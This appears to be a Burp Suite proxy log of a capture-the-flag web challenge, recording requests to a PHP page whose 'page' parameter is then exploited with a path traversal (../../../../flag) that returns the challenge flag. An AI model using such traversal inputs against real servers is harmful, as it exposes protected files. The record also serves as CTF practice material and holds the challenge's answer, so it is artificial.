<?xml version="1.1"?>
<!-- NOTE: Any NULL bytes in requests and responses are preserved within this output, even though this strictly breaks the XML syntax. If your XML parser rejects the NULL bytes then you will need to remove or replace these bytes before parsing. Alternatively, you can use the option to base64-encode requests and responses. -->
<!DOCTYPE items [
<!ELEMENT items (item*)>
<!ATTLIST items burpVersion CDATA "">
<!ATTLIST items exportTime CDATA "">
<!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)>
<!ELEMENT time (#PCDATA)>
<!ELEMENT url (#PCDATA)>
<!ELEMENT host (#PCDATA)>
<!ATTLIST host ip CDATA "">
<!ELEMENT port (#PCDATA)>
<!ELEMENT protocol (#PCDATA)>
<!ELEMENT method (#PCDATA)>
<!ELEMENT path (#PCDATA)>
<!ELEMENT extension (#PCDATA)>
<!ELEMENT request (#PCDATA)>
<!ATTLIST request base64 (true|false) "false">
<!ELEMENT status (#PCDATA)>
<!ELEMENT responselength (#PCDATA)>
<!ELEMENT mimetype (#PCDATA)>
<!ELEMENT response (#PCDATA)>
<!ATTLIST response base64 (true|false) "false">
<!ELEMENT comment (#PCDATA)>
]>
<items burpVersion="1.7.35" exportTime="Thu Dec 13 16:31:51 CST 2018">
  <item>
    <time>Thu Dec 13 16:30:25 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:2003/]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>2003</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET / HTTP/1.1
Host: 140.110.112.32:2003
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>374</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 08:30:25 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Thu, 10 Aug 2017 16:43:08 GMT
ETag: "64-55668e4287f00-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 100
Connection: close
Content-Type: text/html

<html>
<body>
<meta http-equiv='refresh' content='0;url=index.php?page=index.php' />
</body>
</html>]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Thu Dec 13 16:30:25 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:2003/index.php?page=index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>2003</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/index.php?page=index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[GET /index.php?page=index.php HTTP/1.1
Host: 140.110.112.32:2003
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:2003/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>1455</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 08:30:25 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.22
Vary: Accept-Encoding
Content-Length: 1242
Connection: close
Content-Type: text/html


<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>BreakALLCTF</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <link href="bootstrap/css/bootstrap.css" rel="stylesheet">
    <style>
      body {
        padding-top: 60px;
      }
    </style>
    <link href="bootstrap/css/bootstrap-responsive.css" rel="stylesheet">
  </head>

  <body>
    <div class="navbar navbar-inverse navbar-fixed-top">
      <div class="navbar-inner">
        <div class="container">
          <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </button>
          <a class="brand" href="index.php?page=index.php">BreakALL CTF</a>
          <div class="nav-collapse collapse">
            <ul class="nav">
              <li><a href="index.php?page=index.php">Home</a></li>
			  <li><a href="index.php?page=about.php">About</a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>

    <div class="container">
	

<h3>BreakALL CTF</h3></br>
<h4>￤ﾽﾠ￦ﾲﾒ￧ﾜﾋ￥ﾈﾰflag￥ﾗﾎ?</h4>  </body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Thu Dec 13 16:30:31 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:2003/index.php?page=about.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>2003</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/index.php?page=about.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[GET /index.php?page=about.php HTTP/1.1
Host: 140.110.112.32:2003
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>1469</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 08:30:32 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.22
Vary: Accept-Encoding
Content-Length: 1256
Connection: close
Content-Type: text/html


<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>BreakALLCTF</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <link href="bootstrap/css/bootstrap.css" rel="stylesheet">
    <style>
      body {
        padding-top: 60px;
      }
    </style>
    <link href="bootstrap/css/bootstrap-responsive.css" rel="stylesheet">
  </head>

  <body>
    <div class="navbar navbar-inverse navbar-fixed-top">
      <div class="navbar-inner">
        <div class="container">
          <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </button>
          <a class="brand" href="index.php?page=index.php">BreakALL CTF</a>
          <div class="nav-collapse collapse">
            <ul class="nav">
              <li><a href="index.php?page=index.php">Home</a></li>
			  <li><a href="index.php?page=about.php">About</a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>

    <div class="container">
	

<h3>BreakALL CTF</h3></br>
<h4>￥ﾆﾍ￥ﾊﾪ￥ﾊﾛ￤ﾸﾀ￤ﾸﾋ￯ﾼﾌ￥﾿ﾫ￦ﾈﾐ￥ﾊﾟ￤ﾺﾆ!!</h4>

  </body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Thu Dec 13 16:30:39 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:2003/index.php?page=./about.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>2003</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/index.php?page=./about.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[GET /index.php?page=./about.php HTTP/1.1
Host: 140.110.112.32:2003
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>1469</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 08:30:39 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.22
Vary: Accept-Encoding
Content-Length: 1256
Connection: close
Content-Type: text/html


<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>BreakALLCTF</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <link href="bootstrap/css/bootstrap.css" rel="stylesheet">
    <style>
      body {
        padding-top: 60px;
      }
    </style>
    <link href="bootstrap/css/bootstrap-responsive.css" rel="stylesheet">
  </head>

  <body>
    <div class="navbar navbar-inverse navbar-fixed-top">
      <div class="navbar-inner">
        <div class="container">
          <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </button>
          <a class="brand" href="index.php?page=index.php">BreakALL CTF</a>
          <div class="nav-collapse collapse">
            <ul class="nav">
              <li><a href="index.php?page=index.php">Home</a></li>
			  <li><a href="index.php?page=about.php">About</a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>

    <div class="container">
	

<h3>BreakALL CTF</h3></br>
<h4>￥ﾆﾍ￥ﾊﾪ￥ﾊﾛ￤ﾸﾀ￤ﾸﾋ￯ﾼﾌ￥﾿ﾫ￦ﾈﾐ￥ﾊﾟ￤ﾺﾆ!!</h4>

  </body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Thu Dec 13 16:31:28 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:2003/index.php?page=../../../../flag]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>2003</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/index.php?page=../../../../flag]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[GET /index.php?page=../../../../flag HTTP/1.1
Host: 140.110.112.32:2003
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>1432</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 08:31:29 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.22
Vary: Accept-Encoding
Content-Length: 1219
Connection: close
Content-Type: text/html


<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>BreakALLCTF</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <link href="bootstrap/css/bootstrap.css" rel="stylesheet">
    <style>
      body {
        padding-top: 60px;
      }
    </style>
    <link href="bootstrap/css/bootstrap-responsive.css" rel="stylesheet">
  </head>

  <body>
    <div class="navbar navbar-inverse navbar-fixed-top">
      <div class="navbar-inner">
        <div class="container">
          <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </button>
          <a class="brand" href="index.php?page=index.php">BreakALL CTF</a>
          <div class="nav-collapse collapse">
            <ul class="nav">
              <li><a href="index.php?page=index.php">Home</a></li>
			  <li><a href="index.php?page=about.php">About</a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>

    <div class="container">
	

BreakALLCTF{887cs9oKULT0lvtY2bVu}  </body>
</html>
]]></response>
    <comment></comment>
  </item>
</items>
